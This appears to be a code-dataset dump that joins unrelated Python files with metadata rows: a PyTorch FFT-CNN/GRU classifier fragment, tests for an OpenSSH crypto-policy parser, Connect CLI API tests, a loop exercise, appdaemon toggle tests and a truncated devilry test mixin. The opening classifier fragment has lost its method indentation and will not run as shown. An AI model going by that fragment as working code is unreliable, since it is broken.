self.CNN = nn.Sequential(
FFTConv1d(emb_dims, hidden, 64, padding=1),
nn.Dropout(dropout),
nn.ReLU(),
)
self.GRU = nn.GRU(
input_size = hidden,
hidden_size = hidden//2,
num_layers = layers,
bidirectional=True,
dropout=dropout,
batch_first=True,
)
self.attn = nn.MultiheadAttention(
embed_dim=hidden,
num_heads=heads,
)
self.linear = nn.ModuleList([nn.Sequential(
nn.Dropout(dropout),
nn.Linear(hidden*2, hidden),
nn.ReLU(),
nn.Dropout(dropout),
nn.Linear(hidden, 1)
) for _ in range(classes)])
def forward(self, x, lengths=None):
if lengths is None:
x, lengths = x
lengths = lengths.cpu()
x = self.embeddings(x)
#CNN
x = torch.transpose(x, 1, 2)
x = self.CNN(x)
x = torch.transpose(x, 1, 2)
#Gru
x = nn.utils.rnn.pack_padded_sequence(x, lengths, batch_first=True)
x, _ = self.GRU(x)
x, _ = nn.utils.rnn.pad_packed_sequence(x, batch_first=False)
#Attention
x, _ = self.attn(x,x,x)
x = torch.cat((x.mean(0), x.max(0)[0]), dim=1)
x = torch.cat([l(x) for l in self.linear], dim=1)
return x
class FFTCNN(nn.Module):
    def __init__(self, emb_dims=512, hidden:int=128, layers:int=2, vocab_size=20_000, dropout=0.3, classes:int=6, **kwargs):
        super().__init__()
        self.embeddings = nn.Embedding(vocab_size, emb_dims)
        self.CNN = nn.Sequential(
            FFTConv1d(emb_dims, hidden, 3),
            nn.Dropout(dropout),
            nn.ReLU(),
            FFTConv1d(hidden, hidden, 3),
            nn.Dropout(dropout),
            nn.ReLU(),
            nn.AdaptiveMaxPool1d(1),
        )
        self.linear = nn.Sequential(
            nn.Dropout(dropout),
            nn.Linear(hidden, hidden),
            nn.ReLU(),
            nn.Dropout(dropout),
            nn.Linear(hidden, classes),
        )
def forward(self, x, lengths=None):
if lengths is None:
x, lengths = x
x = self.embeddings(x)
x = torch.transpose(x, 1, 2)
x = self.CNN(x)
return self.linear(x[...,0])
| 26.308609 | 133 | 0.658209 | 3,117 | 19,863 | 4.035932 | 0.048123 | 0.039507 | 0.019316 | 0.031479 | 0.875914 | 0.868998 | 0.859777 | 0.829332 | 0.805087 | 0.789269 | 0 | 0.029526 | 0.181544 | 19,863 | 755 | 134 | 26.308609 | 0.744295 | 0.014902 | 0 | 0.711755 | 0 | 0 | 0.005477 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.067633 | false | 0 | 0.006441 | 0 | 0.141707 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
176c380280a850e80792e504381d1533da5ea51b | 6,003 | py | Python | insights/parsers/tests/test_crypto_policies_opensshserver.py | lhuett/insights-core | 1c84eeffc037f85e2bbf60c9a302c83aa1a50cf8 | [
"Apache-2.0"
] | 121 | 2017-05-30T20:23:25.000Z | 2022-03-23T12:52:15.000Z | insights/parsers/tests/test_crypto_policies_opensshserver.py | lhuett/insights-core | 1c84eeffc037f85e2bbf60c9a302c83aa1a50cf8 | [
"Apache-2.0"
] | 1,977 | 2017-05-26T14:36:03.000Z | 2022-03-31T10:38:53.000Z | insights/parsers/tests/test_crypto_policies_opensshserver.py | lhuett/insights-core | 1c84eeffc037f85e2bbf60c9a302c83aa1a50cf8 | [
"Apache-2.0"
] | 244 | 2017-05-30T20:22:57.000Z | 2022-03-26T10:09:39.000Z | from insights.tests import context_wrap
from insights.parsers.crypto_policies import CryptoPoliciesOpensshserver
CPSSHD_1 = """
CRYPTO_POLICY='-oCiphers=aes256-gcm@openssh.com,3des-cbc -oMACs=umac-128-etm@openssh.com'
""".strip()
CPSSHD_2 = """
CRYPTO_POLICY='-oCiphers=aes256-gcm@openssh.com,3des-cbc -oMACs=umac-128-etm@openssh.com,hmac-sha1-etm@openssh.com -oGSSAPIKexAlgorithms=gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ssh-rsa,ssh-rsa-cert-v01@openssh.com,ssh-dss,ssh-dss-cert-v01@openssh.com,rsa-sha2-256,ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,rsa-sha2-512,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ssh-rsa,ssh-rsa-cert-v01@openssh.com,ssh-dss,ssh-dss-cert-v01@openssh.com,rsa-sha2-256,ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,rsa-sha2-512,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com'
""" # no strip on purpose
def test_crypto_policies_opensshserver_1():
    # Extract the quoted policy value once instead of repeating the long literal.
    expected = CPSSHD_1.split("'")[1]
    result = CryptoPoliciesOpensshserver(context_wrap(CPSSHD_1))
    assert result["CRYPTO_POLICY"] == expected
    assert result.get("CRYPTO_POLICY") == expected
    assert result.get("OPTIONS1") is None
    assert "OPTIONS1" not in result
    assert "CRYPTO_POLICY" in result
    assert result.options == expected
def test_crypto_policies_opensshserver_2():
    # Extract the quoted policy value once instead of repeating the long literal.
    expected = CPSSHD_2.split("'")[1]
    result = CryptoPoliciesOpensshserver(context_wrap(CPSSHD_2))
    assert result["CRYPTO_POLICY"] == expected
    assert result.get("CRYPTO_POLICY") == expected
    assert result.get("OPTIONS1") is None
    assert "OPTIONS1" not in result
    assert "CRYPTO_POLICY" in result
    assert result.options == expected
def test_crypto_policies_opensshserver_empty():
result = CryptoPoliciesOpensshserver(context_wrap(""))
assert "OPTIONS1" not in result
assert "CRYPTO_POLICY" not in result
assert result.options is None
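The file under test is a shell-style `KEY='value'` fragment. A minimal sketch of how such a line can be parsed with the standard library alone (`parse_sysconfig` is a hypothetical helper for illustration, not the insights parser):

```python
import shlex

def parse_sysconfig(text):
    # Parse KEY=value lines, honoring shell quoting and skipping comments.
    result = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")  # split at the FIRST '=' only
        result[key.strip()] = " ".join(shlex.split(value))
    return result

parsed = parse_sysconfig(
    "CRYPTO_POLICY='-oCiphers=aes256-gcm@openssh.com -oMACs=umac-128-etm@openssh.com'"
)
assert parsed["CRYPTO_POLICY"].startswith("-oCiphers=")
```

Splitting at the first `=` matters here because the quoted value itself contains `=` characters.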
| 153.923077 | 1,190 | 0.810761 | 932 | 6,003 | 5.189914 | 0.081545 | 0.140583 | 0.138929 | 0.1687 | 0.959272 | 0.925987 | 0.925987 | 0.911929 | 0.903039 | 0.903039 | 0 | 0.11855 | 0.034649 | 6,003 | 38 | 1,191 | 157.973684 | 0.716135 | 0.003165 | 0 | 0.241379 | 0 | 0.275862 | 0.843196 | 0.816449 | 0 | 0 | 0 | 0 | 0.517241 | 1 | 0.103448 | false | 0 | 0.068966 | 0 | 0.172414 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 13 |
17902a46be98df178e822a64fe5894b76edceae5 | 9,399 | py | Python | tests/plugins/product/test_api.py | cloudblue/product-sync | 0e1754967830b19673c1625b82ae1535658ec3bc | [
"Apache-2.0"
] | null | null | null | tests/plugins/product/test_api.py | cloudblue/product-sync | 0e1754967830b19673c1625b82ae1535658ec3bc | [
"Apache-2.0"
] | null | null | null | tests/plugins/product/test_api.py | cloudblue/product-sync | 0e1754967830b19673c1625b82ae1535658ec3bc | [
"Apache-2.0"
] | null | null | null | import pytest
from click.exceptions import ClickException
from connect.cli.plugins.product.api import (
create_item,
create_unit,
delete_item,
get_item,
get_item_by_mpn,
update_item,
)
from connect.client import ConnectClient
def test_get_item(
mocked_responses,
mocked_items_response,
):
client = ConnectClient(
api_key='ApiKey SU:123',
use_specs=False,
endpoint='https://localhost/public/v1',
)
mocked_responses.add(
method='GET',
url='https://localhost/public/v1/products/PRD-276-377-545/items/PRD-276-377-545-0001',
json=mocked_items_response[0],
)
item = get_item(
client=client,
product_id='PRD-276-377-545',
item_id='PRD-276-377-545-0001',
)
assert item == mocked_items_response[0]
def test_get_item_exception_404(
mocked_responses,
):
client = ConnectClient(
api_key='ApiKey SU:123',
use_specs=False,
endpoint='https://localhost/public/v1',
)
mocked_responses.add(
method='GET',
url='https://localhost/public/v1/products/PRD-276-377-545/items/PRD-276-377-545-0001',
status=404,
)
item = get_item(
client=client,
product_id='PRD-276-377-545',
item_id='PRD-276-377-545-0001',
)
assert item is None
def test_get_item_exception_500(
mocked_responses,
):
client = ConnectClient(
api_key='ApiKey SU:123',
use_specs=False,
endpoint='https://localhost/public/v1',
)
mocked_responses.add(
method='GET',
url='https://localhost/public/v1/products/PRD-276-377-545/items/PRD-276-377-545-0001',
status=500,
)
with pytest.raises(ClickException) as e:
get_item(
client=client,
product_id='PRD-276-377-545',
item_id='PRD-276-377-545-0001',
)
assert str(e.value) == "500 - Internal Server Error: unexpected error."
def test_create_unit(
mocked_responses,
):
mocked_responses.add(
method='POST',
url='https://localhost/public/v1/settings/units',
json={
"id": "unit",
"name": "unit-k",
},
status=200,
)
client = ConnectClient(
api_key='ApiKey SU:123',
use_specs=False,
endpoint='https://localhost/public/v1',
)
result = create_unit(
client=client,
data={
"name": "unit-k",
},
)
assert result['id'] == 'unit'
assert mocked_responses.assert_all_requests_are_fired
def test_create_unit_500(
mocked_responses,
):
mocked_responses.add(
method='POST',
url='https://localhost/public/v1/settings/units',
status=500,
)
client = ConnectClient(
api_key='ApiKey SU:123',
use_specs=False,
endpoint='https://localhost/public/v1',
)
with pytest.raises(ClickException) as e:
create_unit(
client=client,
data={
"name": "unit-k",
},
)
assert str(e.value) == "500 - Internal Server Error: unexpected error."
def test_get_item_by_mpn(
mocked_responses,
mocked_items_response,
):
mocked_responses.add(
method='GET',
url='https://localhost/public/v1/products/PRD-276-377-545/items?eq(mpn,'
'MPN-R-001)&limit=1&offset=0',
json=[mocked_items_response[0]],
status=200,
)
client = ConnectClient(
api_key='ApiKey SU:123',
use_specs=False,
endpoint='https://localhost/public/v1',
)
item = get_item_by_mpn(
client=client,
product_id='PRD-276-377-545',
mpn='MPN-R-001',
)
assert item == mocked_items_response[0]
def test_get_item_by_mpn_500(
mocked_responses,
):
mocked_responses.add(
method='GET',
url='https://localhost/public/v1/products/PRD-276-377-545/items?eq(mpn,MPN-R-001)&limit=1&offset=0',
status=500,
)
client = ConnectClient(
api_key='ApiKey SU:123',
use_specs=False,
endpoint='https://localhost/public/v1',
)
with pytest.raises(ClickException) as e:
get_item_by_mpn(
client=client,
product_id='PRD-276-377-545',
mpn='MPN-R-001',
)
assert str(e.value) == "500 - Internal Server Error: unexpected error."
def test_get_item_by_mpn_404(
mocked_responses,
):
mocked_responses.add(
method='GET',
url='https://localhost/public/v1/products/PRD-276-377-545/items?eq(mpn,'
'MPN-R-001)&limit=1&offset=0',
json=[],
status=404,
)
client = ConnectClient(
api_key='ApiKey SU:123',
use_specs=False,
endpoint='https://localhost/public/v1',
)
item = get_item_by_mpn(
client=client,
product_id='PRD-276-377-545',
mpn='MPN-R-001',
)
assert item is None
def test_create_item(
mocked_responses,
mocked_items_response,
):
mocked_responses.add(
method='POST',
url='https://localhost/public/v1/products/PRD-276-377-545/items',
json=mocked_items_response[0],
)
client = ConnectClient(
api_key='ApiKey SU:123',
use_specs=False,
endpoint='https://localhost/public/v1',
)
item = create_item(
client=client,
product_id='PRD-276-377-545',
data=mocked_items_response[0],
)
assert item == mocked_items_response[0]
assert mocked_responses.assert_all_requests_are_fired
def test_create_item_409(
mocked_responses,
mocked_items_response,
):
mocked_responses.add(
method='POST',
url='https://localhost/public/v1/products/PRD-276-377-545/items',
json={
"error_code": "VAL_001",
"errors": [
"name: Item with same name already exists for the product.",
"mpn: Item with same mpn already exists for the product.",
],
},
status=400,
)
client = ConnectClient(
api_key='ApiKey SU:123',
use_specs=False,
endpoint='https://localhost/public/v1',
)
with pytest.raises(ClickException) as e:
create_item(
client=client,
product_id='PRD-276-377-545',
data=mocked_items_response[0],
)
assert "400 - Bad Request: VAL_001 " in str(e.value)
def test_update_item(
mocked_responses,
mocked_items_response,
):
mocked_responses.add(
method='PUT',
url='https://localhost/public/v1/products/PRD-276-377-545/items/PRD-276-377-545-0001',
json=mocked_items_response[0],
status=200,
)
client = ConnectClient(
api_key='ApiKey SU:123',
use_specs=False,
endpoint='https://localhost/public/v1',
)
item = update_item(
client=client,
product_id='PRD-276-377-545',
item_id='PRD-276-377-545-0001',
data=mocked_items_response[0],
)
assert item == mocked_items_response[0]
def test_update_item_mpn_exists(
mocked_responses,
mocked_items_response,
):
mocked_responses.add(
method='PUT',
url='https://localhost/public/v1/products/PRD-276-377-545/items/PRD-276-377-545-0001',
json={
"error_code": "VAL_001",
"errors": [
"mpn: Item with same mpn already exists for the product.",
],
},
status=400,
)
client = ConnectClient(
api_key='ApiKey SU:123',
use_specs=False,
endpoint='https://localhost/public/v1',
)
with pytest.raises(ClickException) as e:
update_item(
client=client,
product_id='PRD-276-377-545',
item_id='PRD-276-377-545-0001',
data=mocked_items_response[0],
)
assert 'Item with same mpn already exists for the product.' in str(e.value)
def test_delete_item(
mocked_responses,
):
mocked_responses.add(
method='DELETE',
url='https://localhost/public/v1/products/PRD-276-377-545/items/PRD-276-377-545-0001',
json={},
status=204,
)
client = ConnectClient(
api_key='ApiKey SU:123',
use_specs=False,
endpoint='https://localhost/public/v1',
)
delete_item(
client=client,
product_id='PRD-276-377-545',
item_id='PRD-276-377-545-0001',
)
assert mocked_responses.assert_all_requests_are_fired
def test_delete_item_published(
mocked_responses,
):
mocked_responses.add(
method='DELETE',
url='https://localhost/public/v1/products/PRD-276-377-545/items/PRD-276-377-545-0001',
json={
"error_code": "PRD_038",
"errors": [
"Only draft Item can be deleted.",
],
},
status=400,
)
client = ConnectClient(
api_key='ApiKey SU:123',
use_specs=False,
endpoint='https://localhost/public/v1',
)
with pytest.raises(ClickException) as e:
delete_item(
client=client,
product_id='PRD-276-377-545',
item_id='PRD-276-377-545-0001',
)
assert 'Only draft Item can be deleted.' in str(e.value)
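The `with pytest.raises(ClickException) as e:` pattern used throughout checks both that the exception is raised and that its message matches. A dependency-free analogue of that pattern (the `Raises` class is a hypothetical sketch of what pytest provides, not a replacement for it):

```python
import contextlib

class Raises(contextlib.AbstractContextManager):
    """Minimal stand-in for pytest.raises: swallow one expected exception."""
    def __init__(self, exc_type):
        self.exc_type = exc_type
        self.value = None
    def __exit__(self, exc_type, exc, tb):
        # Fail if no exception, or the wrong type, was raised in the block.
        assert exc_type is not None and issubclass(exc_type, self.exc_type)
        self.value = exc
        return True  # suppress the expected exception

with Raises(ValueError) as e:
    int("not a number")
assert "not a number" in str(e.value)
```

As in the tests above, the captured exception is inspected after the block via `e.value`.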
| 24.286822 | 108 | 0.586765 | 1,137 | 9,399 | 4.669305 | 0.094987 | 0.042946 | 0.064419 | 0.085892 | 0.92654 | 0.910153 | 0.874741 | 0.873611 | 0.866076 | 0.839518 | 0 | 0.08662 | 0.285137 | 9,399 | 386 | 109 | 24.349741 | 0.703527 | 0 | 0 | 0.709877 | 0 | 0.030864 | 0.27088 | 0.005745 | 0 | 0 | 0 | 0 | 0.049383 | 1 | 0.04321 | false | 0 | 0.012346 | 0 | 0.055556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bd6daffe6ce1b5a8bba19b5c7bfafe701fb2e9d0 | 142 | py | Python | 16_loops_pat.py | teluguprogrammer/learn-python3 | 9565b50ecfff5c2ae39e780afb9a2a15682d1109 | [
"MIT"
] | null | null | null | 16_loops_pat.py | teluguprogrammer/learn-python3 | 9565b50ecfff5c2ae39e780afb9a2a15682d1109 | [
"MIT"
] | null | null | null | 16_loops_pat.py | teluguprogrammer/learn-python3 | 9565b50ecfff5c2ae39e780afb9a2a15682d1109 | [
"MIT"
] | null | null | null | #
# #
# # #
# # # #
# # # # #
for i in range(1, 11): # 1 -> 10
print('* ' * i)
for i in range(1, 11): # 1 -> 10
print('* ' * (10-i)) | 12.909091 | 32 | 0.338028 | 21 | 142 | 2.285714 | 0.380952 | 0.166667 | 0.25 | 0.458333 | 0.916667 | 0.916667 | 0.916667 | 0.916667 | 0.916667 | 0 | 0 | 0.152174 | 0.352113 | 142 | 11 | 33 | 12.909091 | 0.369565 | 0.105634 | 0 | 0.5 | 0 | 0 | 0.04 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 10 |
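The same two triangles can be built as lists of strings instead of printed directly, which makes them easy to inspect and test:

```python
up = ["* " * i for i in range(1, 11)]           # growing triangle, 1 -> 10 stars
down = ["* " * (10 - i) for i in range(1, 11)]  # shrinking triangle, 9 -> 0 stars
print("\n".join(up + down))
```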
bdcf91b8bcaddbc079a4de9e878a94c8753d9e9b | 10,102 | py | Python | tests/time_based_toggle_automations_test.py | Robert1991/appdaemon | ba346d5b79d24ae7684390e717c1030e317d7600 | [
"Unlicense"
] | null | null | null | tests/time_based_toggle_automations_test.py | Robert1991/appdaemon | ba346d5b79d24ae7684390e717c1030e317d7600 | [
"Unlicense"
] | null | null | null | tests/time_based_toggle_automations_test.py | Robert1991/appdaemon | ba346d5b79d24ae7684390e717c1030e317d7600 | [
"Unlicense"
] | null | null | null | from apps.general.time_based_toggle_automations import TimeBasedToggleAutomation
from apps.general.time_based_toggle_automations import TurnOnOffInterval
from datetime import time
from mock import patch
from appdaemontestframework import automation_fixture
@automation_fixture(TurnOnOffInterval)
def turn_on_off_interval(given_that):
given_that.passed_arg('toggled_entity') \
.is_set_to('switch.toggled_entity')
given_that.passed_arg('on_interval_length') \
.is_set_to('input_number.on_interval_length')
given_that.passed_arg('off_interval_length') \
.is_set_to('input_number.off_interval_length')
given_that.state_of('input_number.on_interval_length') \
.is_set_to('60', {'unit_of_measurement': 's'})
given_that.state_of('input_number.off_interval_length') \
.is_set_to('120', {'unit_of_measurement': 's'})
TurnOnOffInterval.initialize_on_creation = False
def test_initialize_timers_on_off_interval_without_time_restriction(turn_on_off_interval, given_that, assert_that, time_travel):
turn_on_off_interval.initalize_timers(None, None, None, None, None)
assert_that('switch.toggled_entity').was.turned_on()
given_that.mock_functions_are_cleared()
time_travel.fast_forward(61).seconds()
assert_that('switch.toggled_entity').was.turned_off()
time_travel.fast_forward(118).seconds()
given_that.mock_functions_are_cleared()
assert_that('switch.toggled_entity').was_not.turned_on()
time_travel.fast_forward(3).seconds()
assert_that('switch.toggled_entity').was.turned_on()
def test_initialize_timers_without_time_restriction_timer_reinitialized_on_event(turn_on_off_interval, given_that, assert_that, time_travel):
with patch('appdaemon.adapi.ADAPI.timer_running'):
turn_on_off_interval.initalize_timers(None, None, None, None, None)
assert_that('switch.toggled_entity').was.turned_on()
given_that.mock_functions_are_cleared()
time_travel.fast_forward(30).seconds()
turn_on_off_interval.initalize_timers(None, None, None, None, None)
time_travel.fast_forward(31).seconds()
assert_that('switch.toggled_entity').was_not.turned_off()
given_that.mock_functions_are_cleared()
time_travel.fast_forward(30).seconds()
assert_that('switch.toggled_entity').was.turned_off()
@automation_fixture(TimeBasedToggleAutomation)
def toggle_automation(given_that):
given_that.passed_arg('time_interval_start') \
.is_set_to('input_datetime.interval_start')
given_that.passed_arg('time_interval_end') \
.is_set_to('input_datetime.interval_end')
given_that.passed_arg('toggled_entity') \
.is_set_to('switch.toggled_switch')
TimeBasedToggleAutomation.initialize_on_creation = False
def test_initalize_timers_both_timer_activated_and_switch_not_turned_on_because_earlier_as_start_time(given_that, toggle_automation, assert_that, time_travel):
given_that.time_is(time(hour=16))
given_that.state_of('input_datetime.interval_start') \
.is_set_to('18:30:00')
given_that.state_of('input_datetime.interval_end') \
.is_set_to('02:30:00')
toggle_automation.initalize_timers(None, None, None, None, None)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=18, minute=30), toState=True) \
.with_callback(toggle_automation.toggle)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=2, minute=30), toState=False) \
.with_callback(toggle_automation.toggle)
assert_that("switch.toggled_switch").was.turned_off()
def test_initalize_timers_both_timer_activated_and_switch_turned_on_because_earlier_as_end_time(given_that, toggle_automation, assert_that, time_travel):
given_that.time_is(time(hour=1))
given_that.state_of('input_datetime.interval_start') \
.is_set_to('18:30:00')
given_that.state_of('input_datetime.interval_end') \
.is_set_to('02:30:00')
toggle_automation.initalize_timers(None, None, None, None, None)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=18, minute=30), toState=True) \
.with_callback(toggle_automation.toggle)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=2, minute=30), toState=False) \
.with_callback(toggle_automation.toggle)
assert_that("switch.toggled_switch").was.turned_on()
def test_initalize_timers_both_timer_activated_and_switch_turned_off_because_earlier_as_start_time_on_same_day(given_that, toggle_automation, assert_that, time_travel):
given_that.time_is(time(hour=18))
given_that.state_of('input_datetime.interval_start') \
.is_set_to('18:30:00')
given_that.state_of('input_datetime.interval_end') \
.is_set_to('20:30:00')
toggle_automation.initalize_timers(None, None, None, None, None)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=18, minute=30), toState=True) \
.with_callback(toggle_automation.toggle)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=20, minute=30), toState=False) \
.with_callback(toggle_automation.toggle)
assert_that("switch.toggled_switch").was.turned_off()
def test_initalize_timers_both_timer_activated_and_switch_turned_on_because_later_as_start_time_on_same_day(given_that, toggle_automation, assert_that, time_travel):
given_that.time_is(time(hour=19))
given_that.state_of('input_datetime.interval_start') \
.is_set_to('18:30:00')
given_that.state_of('input_datetime.interval_end') \
.is_set_to('02:30:00')
toggle_automation.initalize_timers(None, None, None, None, None)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=18, minute=30), toState=True) \
.with_callback(toggle_automation.toggle)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=2, minute=30), toState=False) \
.with_callback(toggle_automation.toggle)
assert_that("switch.toggled_switch").was.turned_on()
def test_initalize_timers_both_timer_activated_and_switch_turned_on_because_later_as_start_time_on_the_next_day(given_that, toggle_automation, assert_that, time_travel):
given_that.time_is(time(hour=1))
given_that.state_of('input_datetime.interval_start') \
.is_set_to('18:30:00')
given_that.state_of('input_datetime.interval_end') \
.is_set_to('02:30:00')
toggle_automation.initalize_timers(None, None, None, None, None)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=18, minute=30), toState=True) \
.with_callback(toggle_automation.toggle)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=2, minute=30), toState=False) \
.with_callback(toggle_automation.toggle)
assert_that("switch.toggled_switch").was.turned_on()
def test_initalize_timers_both_timer_activated_and_switch_turned_off_because_later_as_end_time_on_the_next_day(given_that, toggle_automation, assert_that, time_travel):
given_that.time_is(time(hour=3))
given_that.state_of('input_datetime.interval_start') \
.is_set_to('18:30:00')
given_that.state_of('input_datetime.interval_end') \
.is_set_to('02:30:00')
toggle_automation.initalize_timers(None, None, None, None, None)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=18, minute=30), toState=True) \
.with_callback(toggle_automation.toggle)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=2, minute=30), toState=False) \
.with_callback(toggle_automation.toggle)
assert_that("switch.toggled_switch").was.turned_off()
def test_initalize_timers_both_timer_activated_and_switch_turned_off_because_later_as_end_time_on_the_same_day(given_that, toggle_automation, assert_that, time_travel):
given_that.time_is(time(hour=17))
given_that.state_of('input_datetime.interval_start') \
.is_set_to('10:30:00')
given_that.state_of('input_datetime.interval_end') \
.is_set_to('16:30:00')
toggle_automation.initalize_timers(None, None, None, None, None)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=10, minute=30), toState=True) \
.with_callback(toggle_automation.toggle)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=16, minute=30), toState=False) \
.with_callback(toggle_automation.toggle)
assert_that("switch.toggled_switch").was.turned_off()
def test_initalize_timers_on_event_check_timer_cancelled_when_new_event_occurs(given_that, toggle_automation, assert_that, time_travel):
given_that.time_is(time(hour=17))
given_that.state_of('input_datetime.interval_start') \
.is_set_to('10:30:00')
given_that.state_of('input_datetime.interval_end') \
.is_set_to('16:30:00')
toggle_automation.initalize_timers(None, None, None, None, None)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=10, minute=30), toState=True) \
.with_callback(toggle_automation.toggle)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=16, minute=30), toState=False) \
.with_callback(toggle_automation.toggle)
assert_that("switch.toggled_switch").was.turned_off()
given_that.mock_functions_are_cleared()
given_that.time_is(time(hour=17))
given_that.state_of('input_datetime.interval_start') \
.is_set_to('10:30:00')
given_that.state_of('input_datetime.interval_end') \
.is_set_to('17:30:00')
toggle_automation.initalize_timers_on_event(None, None, None)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=10, minute=30), toState=True) \
.with_callback(toggle_automation.toggle)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=17, minute=30), toState=False) \
.with_callback(toggle_automation.toggle)
assert_that("switch.toggled_switch").was.turned_on()
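The on/off decision these tests exercise boils down to asking whether the current time lies inside an interval that may wrap past midnight (e.g. 18:30 to 02:30). A minimal sketch of that check (`in_interval` is a hypothetical helper, not the app's code):

```python
from datetime import time

def in_interval(now, start, end):
    if start <= end:
        # Interval within a single day, e.g. 10:30 -> 16:30.
        return start <= now < end
    # Interval wraps past midnight, e.g. 18:30 -> 02:30.
    return now >= start or now < end

# Same scenarios as the tests above:
assert in_interval(time(1, 0), time(18, 30), time(2, 30)) is True    # switch on
assert in_interval(time(16, 0), time(18, 30), time(2, 30)) is False  # switch off
assert in_interval(time(17, 0), time(10, 30), time(16, 30)) is False # switch off
```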
| 43.543103 | 168 | 0.753514 | 1,396 | 10,102 | 5.022206 | 0.07808 | 0.123235 | 0.058194 | 0.050207 | 0.903723 | 0.889174 | 0.834831 | 0.824704 | 0.787905 | 0.768221 | 0 | 0.023692 | 0.135122 | 10,102 | 231 | 169 | 43.731602 | 0.778757 | 0 | 0 | 0.710227 | 0 | 0 | 0.137498 | 0.10879 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.068182 | false | 0.034091 | 0.028409 | 0 | 0.096591 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
da02cd1d0397e93d60f3a59452ccad121498bf92 | 30,200 | py | Python | devilry/devilry_group/tests/test_feedbackfeed/mixins/mixin_feedbackfeed_admin.py | devilry/devilry-django | 9ae28e462dfa4cfee966ebacbca04ade9627e715 | [
"BSD-3-Clause"
] | 29 | 2015-01-18T22:56:23.000Z | 2020-11-10T21:28:27.000Z | devilry/devilry_group/tests/test_feedbackfeed/mixins/mixin_feedbackfeed_admin.py | devilry/devilry-django | 9ae28e462dfa4cfee966ebacbca04ade9627e715 | [
"BSD-3-Clause"
] | 786 | 2015-01-06T16:10:18.000Z | 2022-03-16T11:10:50.000Z | devilry/devilry_group/tests/test_feedbackfeed/mixins/mixin_feedbackfeed_admin.py | devilry/devilry-django | 9ae28e462dfa4cfee966ebacbca04ade9627e715 | [
"BSD-3-Clause"
] | 15 | 2015-04-06T06:18:43.000Z | 2021-02-24T12:28:30.000Z | # -*- coding: utf-8 -*-
import mock
from django import http
from django.conf import settings
from django.http import Http404
from django.utils import timezone
from model_bakery import baker
from devilry.apps.core import models as core_models
from devilry.devilry_account import models as account_models
from devilry.devilry_account.models import PeriodPermissionGroup
from devilry.devilry_group import devilry_group_baker_factories as group_baker
from devilry.devilry_group import models as group_models
from devilry.devilry_group.cradmin_instances import crinstance_admin
from devilry.devilry_group.tests.test_feedbackfeed.mixins import mixin_feedbackfeed_common
class MixinTestFeedbackfeedAdmin(mixin_feedbackfeed_common.MixinTestFeedbackFeed):
"""
Mixin testclass for admin feedbackfeed tests.
Add tests for functionality and ui that all admin views share.
"""
viewclass = None
def __mock_cradmin_instance(self):
